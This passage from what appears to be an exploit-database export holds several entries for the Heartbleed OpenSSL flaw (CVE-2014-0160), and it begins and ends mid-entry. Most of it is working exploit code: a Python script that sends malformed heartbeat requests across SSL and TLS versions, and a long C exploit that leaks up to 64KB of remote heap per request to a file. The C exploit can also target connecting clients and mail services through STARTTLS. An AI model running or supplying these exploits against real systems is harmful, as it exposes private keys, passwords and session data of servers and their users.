server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "edition": 1, "published": "2014-04-09T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "href": "", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\n# Date: [2014-04-09]\n# Exploit Author: [Csaba Fitzl]\n# Vendor Homepage: [http://www.openssl.org/]\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\n# Version: [1.0.1f]\n# Tested on: [N/A]\n# CVE : [2014-0160]\n\n\n#!/usr/bin/env python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\n\nversion = []\nversion.append(['SSL 3.0','03 00'])\nversion.append(['TLS 1.0','03 01'])\nversion.append(['TLS 1.1','03 02'])\nversion.append(['TLS 1.2','03 03'])\n\ndef create_hello(version):\n\thello = h2bin('16 ' + 
version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\treturn hello\n\ndef create_hb(version):\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\n\treturn hb\n\ndef hexdump(s):\n\tfor b in xrange(0, len(s), 16):\n\t\tlin = [c for c in s[b : b + 16]]\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\n\tprint\n\ndef recvall(s, length, timeout=5):\n\tendtime = time.time() + timeout\n\trdata = ''\n\tremain = length\n\twhile remain > 0:\n\t\trtime = endtime - time.time()\n\t\tif rtime < 0:\n\t\t\treturn None\n\t\tr, w, e = select.select([s], [], [], 5)\n\t\tif s in r:\n\t\t\tdata = s.recv(remain)\n\t\t\t# EOF?\n\t\t\tif not data:\n\t\t\t\treturn None\n\t\t\trdata += data\n\t\t\tremain -= len(data)\n\treturn rdata\n\n\ndef recvmsg(s):\n\thdr = recvall(s, 5)\n\tif hdr is None:\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\n\t\treturn None, None, None\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\n\tpay = recvall(s, ln, 10)\n\tif pay is None:\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\n\t\treturn None, None, None\n\tprint ' ... 
received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n\treturn typ, ver, pay\n\ndef hit_hb(s,hb):\n\ts.send(hb)\n\twhile True:\n\t\ttyp, ver, pay = recvmsg(s)\n\t\tif typ is None:\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\n\t\t\treturn False\n\n\t\tif typ == 24:\n\t\t\tprint 'Received heartbeat response:'\n\t\t\thexdump(pay)\n\t\t\tif len(pay) > 3:\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\n\t\t\telse:\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\n\t\t\treturn True\n\n\t\tif typ == 21:\n\t\t\tprint 'Received alert:'\n\t\t\thexdump(pay)\n\t\t\tprint 'Server returned error, likely not vulnerable'\n\t\t\treturn False\n\ndef main():\n\topts, args = options.parse_args()\n\tif len(args) < 1:\n\t\toptions.print_help()\n\t\treturn\n\tfor i in range(len(version)):\n\t\tprint 'Trying ' + version[i][0] + '...'\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tprint 'Connecting...'\n\t\tsys.stdout.flush()\n\t\ts.connect((args[0], opts.port))\n\t\tprint 'Sending Client Hello...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hello(version[i][1]))\n\t\tprint 'Waiting for Server Hello...'\n\t\tsys.stdout.flush()\n\t\twhile True:\n\t\t\ttyp, ver, pay = recvmsg(s)\n\t\t\tif typ == None:\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\n\t\t\t\treturn\n\t\t\t# Look for server hello done message.\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\n\t\t\t\tbreak\n\n\t\tprint 'Sending heartbeat request...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hb(version[i][1]))\n\t\tif hit_hb(s,create_hb(version[i][1])):\n\t\t\t#Stop if vulnerable\n\t\t\tbreak\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "edition": 1, "published": 
"2014-04-10T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F", "href": "", "sourceData": "/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\n* =========================================================\n* This exploit uses OpenSSL to create an encrypted connection\n* and trigger the heartbleed leak. The leaked information is\n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\n* This exploit leaks upto 65535 bytes of remote heap each request\n* and can be run in a loop until the connected peer ends connection.\n* The data leaked contains 16 bytes of random padding at the end.\n* The exploit can be used against a connecting client or server,\n* it can also send pre_cmd's to plain-text services to establish\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\n* will often forcefully close the connection during large leak\n* requests so try to lower your payload request size. 
\n*\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n*\n* E.g.\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ connecting to 192.168.11.23 443/tcp\n* [ connected to 192.168.11.23 443/tcp\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ heartbleed leaked length=65535\n* [ final record type=24, length=16384\n* [ wrote 16381 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=42\n* [ decrypting SSL packet\n* [ final record type=24, length=18\n* [ wrote 18 bytes of heap to file 'out'\n* [ done.\n* $ ls -al out\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\n* $ hexdump -C out\n* - snip - snip \n*\n* Use following example command to generate certificates for clients.\n*\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n* -keyout server.key -out server.crt\n*\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n*\n* todo: add udp/dtls support.\n*\n* - Hacker Fantastic\n* http://www.mdsec.co.uk\n*\n*/\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <signal.h>\n#include <netdb.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n#include 
<sys/types.h>\n#include <netinet/in.h>\n#include <inttypes.h>\n#include <openssl/bio.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <openssl/evp.h>\n#include <openssl/tls1.h>\n#include <openssl/rand.h>\n#include <openssl/buffer.h>\n\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\n\t\t(((unsigned int)(c[1])) )),c+=2)\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\n\nint first = 0;\nint leakbytes = 0;\nint repeat = 1;\nint badpackets = 0;\n\ntypedef struct {\n\tint socket;\n\tSSL *sslHandle;\n\tSSL_CTX *sslContext;\n} connection;\n\ntypedef struct {\n unsigned char type;\n short version;\n unsigned int length;\n unsigned char hbtype;\n unsigned int payload_length;\n void* payload;\n} heartbeat;\n\nvoid ssl_init();\nvoid usage();\nint tcp_connect(char*,int);\nint tcp_bind(char*, int);\nconnection* tls_connect(int);\nconnection* tls_bind(int);\nint pre_cmd(int,int,int);\nvoid* heartbleed(connection* ,unsigned int);\nvoid* sneakyleaky(connection* ,char*, int);\n\nint tcp_connect(char* server,int port){\n\tint sd,ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n host = gethostbyname(server);\n sd = socket(AF_INET, SOCK_STREAM, 0);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n bzero(&(sa.sin_zero),8);\n\tprintf(\"[ connecting to %s %d/tcp\\n\",server,port);\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\n\tif(ret==0){\n\t\tprintf(\"[ connected to %s %d/tcp\\n\",server,port);\n\t}\n\telse{\n\t\tprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\n\t\texit(0);\n\t}\n\treturn sd;\n}\n\nint tcp_bind(char* server, int port){\n\tint sd, ret, val=1;\n\tstruct sockaddr_in sin;\n\tstruct hostent *host;\n\thost = gethostbyname(server);\n\tsd=socket(AF_INET,SOCK_STREAM,0);\n\tif(sd==-1){\n \t\tprintf(\"[!] 
cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tmemset(&sin,0,sizeof(sin));\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\n\tsin.sin_family=AF_INET;\n\tsin.sin_port=htons(port);\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\n\tif(ret==-1){\n\t\tprintf(\"[!] cannot bind socket\\n\");\n\t\texit(0);\n\t}\n\tlisten(sd,5);\n\treturn(sd);\n}\n\n\nvoid ssl_init(){\n SSL_load_error_strings();\n SSL_library_init();\n OpenSSL_add_all_digests();\n OpenSSL_add_all_algorithms();\n OpenSSL_add_all_ciphers();\n}\n\nconnection* tls_connect(int sd){\n connection *c;\n\tc = malloc(sizeof(connection));\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n c->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n if(SSL_connect(c->sslHandle)!=1)\n ERR_print_errors_fp(stderr);\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n\treturn c;\n}\n\nconnection* tls_bind(int sd){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL 
| SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\n\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nint pre_cmd(int sd,int precmd,int verbose){\n\t/* this function can be used to send commands to a plain-text\n\tservice or client before heartbleed exploit attempt. e.g. 
STARTTLS */\n\tint rc, go = 0;\n\tchar* buffer;\n\tchar* line1;\n\tchar* line2; \n\tswitch(precmd){\n\t\tcase 0:\n\t\t\tline1 = \"EHLO test\\n\";\n\t\t\tline2 = \"STARTTLS\\n\";\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tline1 = \"CAPA\\n\";\n\t\t\tline2 = \"STLS\\n\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tline1 = \"a001 CAPB\\n\";\n\t\t\tline2 = \"a002 STARTTLS\\n\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tgo = 1;\n\t\t\tbreak;\n\t}\n\tif(go==0){\n\t\tbuffer = malloc(2049);\n\t if(buffer==NULL){\n \tprintf(\"[ error in malloc()\\n\");\n \texit(0);\n\t }\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tprintf(\"[ banner: %s\",buffer);\n\t\tsend(sd,line1,strlen(line1),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t\tsend(sd,line2,strlen(line2),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t}\n\treturn sd;\n}\n\nvoid* heartbleed(connection *c,unsigned int type){\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\ts2n(0xffff,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\n OPENSSL_free(buf);\n\treturn c;\n}\n\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned mac_size, orig_len;\n size_t extra;\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n if (c->sslHandle->options & 
SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\n extra=SSL3_RT_MAX_EXTRA;\n else\n extra=0;\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n tls1_enc(s,0);\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= 
mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' 
':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\nvoid usage(){\n\tprintf(\"[\\n\");\n\tprintf(\"[ --server|-s <ip/dns> - the server to target\\n\");\n\tprintf(\"[ --port|-p <port> - the port to target\\n\");\n\tprintf(\"[ --file|-f <filename> - file to write data to\\n\");\n\tprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\n\tprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\n\tprintf(\"[\t\t\t 0 = SMTP\\n\");\n\tprintf(\"[\t\t\t 1 = POP3\\n\");\n\tprintf(\"[\t\t\t 2 = IMAP\\n\");\n\tprintf(\"[ --loop|-l\t\t - loop the exploit attempts\\n\");\n\tprintf(\"[ --type|-t <n> - select exploit to try\\n\");\n\tprintf(\"[ 0 = null length\\n\");\n\tprintf(\"[\t\t\t 1 = max leak\\n\");\n\tprintf(\"[\t\t\t n = heartbeat payload_length\\n\");\n\tprintf(\"[\\n\");\n\tprintf(\"[ --verbose|-v - output leak to screen\\n\");\n\tprintf(\"[ --help|-h - this output\\n\");\n\tprintf(\"[\\n\");\n\texit(0);\n}\n\nint main(int argc, char* 
argv[]){\n\tint ret, port, userc, index;\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\n\tint loop = 0;\n\tstruct hostent *h;\n\tconnection* c;\n\tchar *host, *file;\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\n\tprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\n\tprintf(\"[ =============================================================\\n\");\n static struct option options[] = {\n \t{\"server\", 1, 0, 's'},\n\t {\"port\", 1, 0, 'p'},\n\t\t{\"file\", 1, 0, 'f'},\n\t\t{\"type\", 1, 0, 't'},\n\t\t{\"bind\", 1, 0, 'b'},\n\t\t{\"verbose\", 0, 0, 'v'},\n\t\t{\"precmd\", 1, 0, 'c'},\n\t\t{\"loop\", 0, 0, 'l'},\n\t\t{\"help\", 0, 0,'h'}\n };\n\twhile(userc != -1) {\n\t userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvh\",options,&index);\t\n \tswitch(userc) {\n \t\tcase -1:\n\t break;\n \t case 's':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\n\t\t\t\t\tif(h==NULL){\n\t\t\t\t\t\tprintf(\"[!] 
FATAL: unknown host '%s'\\n\",optarg);\n\t\t\t\t\t\texit(1);\n\t\t\t\t\t}\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(host==NULL){\n \t\t\t\tprintf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n \t\t\t}\n\t\t\t\tbreak;\n\t case 'p':\n\t\t\t\tif(iport==0){\n\t\t\t\t\tport = atoi(optarg);\n\t\t\t\t\tiport = 1;\n\t\t\t\t}\n \t break;\n\t\t\tcase 'f':\n\t\t\t\tif(ifile==0){\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(file==NULL){\n\t\t\t\t printf(\"[ error in malloc()\\n\");\n \t\t\t\texit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(file,\"%s\",optarg);\n\t\t\t\t\tifile = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 't':\n\t\t\t\tif(itype==0){\n\t\t\t\t\ttype = atoi(optarg);\n\t\t\t\t\titype = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'h':\n\t\t\t\tusage();\n\t\t\t\tbreak;\n\t\t\tcase 'b':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\n\t\t\t\t\tif(host==NULL){\n\t\t\t \t printf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n\t\t\t\t }\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n\t\t\t\t\tbind = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'c':\n\t\t\t\tif(iprecmd == 0){\n\t\t\t\t\tiprecmd = 1;\n\t\t\t\t\tprecmd = atoi(optarg);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'v':\n\t\t\t\tverbose = 1;\n\t\t\t\tbreak;\n\t\t\tcase 'l':\n\t\t\t\tloop = 1;\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tbreak;\n\t\t}\n\t}\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\n\t\tprintf(\"[ try --help\\n\");\n\t\texit(0);\n\t}\n\tssl_init();\n\tif(bind==0){\n\t\tret = tcp_connect(host, port);\n\t\tpre_cmd(ret, precmd, verbose);\n\t\tc = tls_connect(ret);\n\t\theartbleed(c,type);\n\t\twhile(repeat==1){\n\t\t\tsneakyleaky(c,file,verbose);\n\t\t}\n\t\twhile(loop==1){\n\t\t\tprintf(\"[ entered heartbleed 